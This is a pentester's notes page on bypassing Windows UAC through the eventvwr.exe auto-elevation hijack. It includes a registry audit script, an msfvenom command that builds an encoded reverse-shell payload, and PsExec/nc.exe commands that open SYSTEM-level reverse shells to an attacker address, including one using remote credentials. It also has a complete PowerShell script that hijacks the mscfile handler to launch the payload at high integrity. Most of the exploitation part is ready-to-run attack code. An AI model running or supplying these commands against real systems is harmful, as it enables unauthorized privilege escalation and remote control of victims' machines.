Security Notes

UAC bypass

Check configuration

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

Registry values

  • ConsentPromptBehaviorAdmin: how UAC prompts members of the Administrators group [0x0 - 0x5, see the policy list below]

  • EnableLUA: UAC enabled [0x0 / 0x1]; 0x0 means UAC is off entirely and no bypass is needed

  • PromptOnSecureDesktop: show the prompt on the secure desktop [0x0 / 0x1]

Consent prompt behavior policies (values of ConsentPromptBehaviorAdmin)

  • 0x0 - Elevate without prompting: allows privileged accounts to perform an operation that requires elevation without requiring consent or credentials.

  • 0x1 - Prompt for credentials on the secure desktop: when an operation requires elevation of privilege, the user is prompted on the secure desktop to enter a privileged (ex: administrator) user name and password. If the user enters valid credentials, the operation continues with the user's highest available privilege.

  • 0x2 - Prompt for consent on the secure desktop ("Always notify" in the UAC slider): when an operation requires elevation of privilege, the user is prompted on the secure desktop to select either Yes or No. If the user selects Yes, the operation continues with the user's highest available privilege. Auto-elevation bypasses such as eventvwr do not work at this level.

  • 0x3 - Prompt for credentials: when an operation requires elevation of privilege, the user is prompted to enter an administrator user name and password. If the user enters valid credentials, the operation continues with the applicable privilege.

  • 0x4 - Prompt for consent: when an operation requires elevation of privilege, the user is prompted to select either Yes or No. If the user selects Yes, the operation continues with the user's highest available privilege.

  • 0x5 - Prompt for consent for non-Windows binaries (default): when an operation for a non-Microsoft application requires elevation of privilege, the user is prompted on the secure desktop to select either Yes or No. If the user selects Yes, the operation continues with the user's highest available privilege. Signed Windows binaries marked auto-elevate (eventvwr.exe among them) elevate silently, which is what the bypass below abuses.
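The reg query above returns raw DWORDs. The script below is an added example (not from the original page) that reads the same three values, translates ConsentPromptBehaviorAdmin with the list above, and tells you whether the current session is the situation a UAC bypass targets: a member of Administrators running at medium integrity with UAC below "Always notify". It assumes a local, interactive PowerShell session and uses only the real value names under HKLM; the membership check parses whoami /groups because a filtered (medium-integrity) token lists Administrators as deny-only, which the .NET WindowsIdentity.Groups collection hides.

```powershell
# Added example: audit the UAC configuration and the current token.
# Assumes a local interactive PowerShell session; no other setup.
$key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$p   = Get-ItemProperty -Path $key

# Meaning of ConsentPromptBehaviorAdmin, as in the policy list above
$adminPrompt = @{
    0 = 'Elevate without prompting'
    1 = 'Prompt for credentials on the secure desktop'
    2 = 'Prompt for consent on the secure desktop (Always notify)'
    3 = 'Prompt for credentials'
    4 = 'Prompt for consent'
    5 = 'Prompt for consent for non-Windows binaries (default)'
}

$lua = [int]$p.EnableLUA
$cpb = [int]$p.ConsentPromptBehaviorAdmin
"EnableLUA                  : $lua  ($(if ($lua -eq 1) { 'UAC on' } else { 'UAC off: no bypass needed' }))"
"ConsentPromptBehaviorAdmin : $cpb  ($($adminPrompt[$cpb]))"
"PromptOnSecureDesktop      : $($p.PromptOnSecureDesktop)"

# Is this process already elevated? IsInRole is false for a filtered token.
$id        = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($id)
$elevated  = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

# Is the user in BUILTIN\Administrators (S-1-5-32-544) at all? whoami /groups
# still lists the group when the token carries it as "used for deny only".
$inAdminGroup = [bool]((whoami /groups) -match 'S-1-5-32-544')
"Elevated now               : $elevated"
"Member of Administrators   : $inAdminGroup"

if ($lua -eq 1 -and $inAdminGroup -and -not $elevated) {
    if ($cpb -eq 2) {
        'UAC is at Always notify: auto-elevation bypasses (eventvwr and the like) will not work.'
    } else {
        'Split-token admin at medium integrity with UAC below Always notify: the eventvwr bypass is a candidate.'
    }
} elseif ($elevated) {
    'Already high integrity: no UAC bypass required.'
}
```

Run it from the medium-integrity shell you landed in; if it reports "Already high integrity" there is nothing to bypass, and if it reports "Always notify" move on to another privilege escalation path rather than the eventvwr module.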

Eventvwr exploitation

Requirements

  • Windows 7, 8.1, 10 before the Creators Update (1703), which patched this technique

  • The current user is a member of the local Administrators group, running at medium integrity (split token)

  • ConsentPromptBehaviorAdmin == 0x5 (the default); the bypass does not work at 0x2 (Always notify)

  • eventvwr.exe must exist and be an auto-elevating Windows binary

Exploitation

Exploit scripts

  • exploit/windows/local/bypassuac_eventvwr Metasploit module

Payload

msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -e x86/shikata_ga_nai > payload.exe

Create elevated reverse shell

From the high-integrity shell obtained with the bypass, PsExec can spawn a SYSTEM-level reverse shell (-s runs as SYSTEM, -i makes it interactive in the current session, -d returns without waiting). Give nc.exe a full path, because the process is started by the PsExec service and not from your working directory. The second form runs the same command on a remote machine with explicit credentials.

PsExec64.exe -accepteula -i -d -s <path>\nc.exe <ip> <port> -e cmd.exe
PsExec64.exe \\<machine> -accepteula -u <machine>\<user> -p <pass> <path>\nc.exe <ip> <port> -e cmd.exe
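The Metasploit module, the Powershell script and the C file all do the same thing: hijack the .msc file handler under the current user's hive so that the auto-elevated eventvwr.exe (which launches mmc.exe with eventvwr.msc) runs a command of our choosing at high integrity. The script below is an added example, not the page's own script or the module's code, that does this by hand with the msfvenom payload built above. It assumes payload.exe sits in the current directory (the $payload parameter is the only name not taken from the page), that the requirements listed above hold, and it removes the hijacked key afterwards.

```powershell
# Added example: manual eventvwr UAC bypass (what bypassuac_eventvwr automates).
# Assumptions: payload.exe from the msfvenom command above is at $payload;
# you are an Administrators member at medium integrity; UAC is not at
# Always notify; Windows 10 build before 1703.
param([string]$payload = "$PWD\payload.exe")

$hijack = 'HKCU:\Software\Classes\mscfile\shell\open\command'

# Pre-flight checks so we do not touch the registry for nothing
if (-not (Test-Path $payload)) { throw "payload not found: $payload" }
$uac = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
if ([int]$uac.EnableLUA -ne 1)                  { throw 'UAC is disabled; just run the payload.' }
if ([int]$uac.ConsentPromptBehaviorAdmin -eq 2) { throw 'Always notify: this bypass will not work.' }
$eventvwr = Join-Path $env:SystemRoot 'System32\eventvwr.exe'
if (-not (Test-Path $eventvwr)) { throw 'eventvwr.exe not found' }

try {
    # eventvwr.exe is auto-elevated and starts mmc.exe with eventvwr.msc.
    # mmc resolves the mscfile handler through HKCU\Software\Classes first
    # (the user-writable half of HKCR), so the command we register here is
    # executed with the high-integrity token instead of the real handler.
    New-Item -Path $hijack -Force | Out-Null
    Set-ItemProperty -Path $hijack -Name '(default)' -Value "`"$payload`""

    Start-Process -FilePath $eventvwr -WindowStyle Hidden
    Start-Sleep -Seconds 5      # give mmc time to spawn the payload
}
finally {
    # Always clean up: a leftover key would re-run the payload on every
    # later .msc open and is an obvious forensic artifact.
    Remove-Item -Path 'HKCU:\Software\Classes\mscfile' -Recurse -Force -ErrorAction SilentlyContinue
}
```

Start a listener (nc -lvnp <port>) before running it; the reverse shell that connects back is high integrity, and the PsExec commands above can then take it to SYSTEM. On a patched build eventvwr.exe simply opens the Event Viewer and nothing connects back.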
Manual exploit files

  • Powershell script

  • C file

Don't forget to uncomment the strcat and GetCurrentDirectory commands and replace foobar.exe with your payload.

Last updated 4 years ago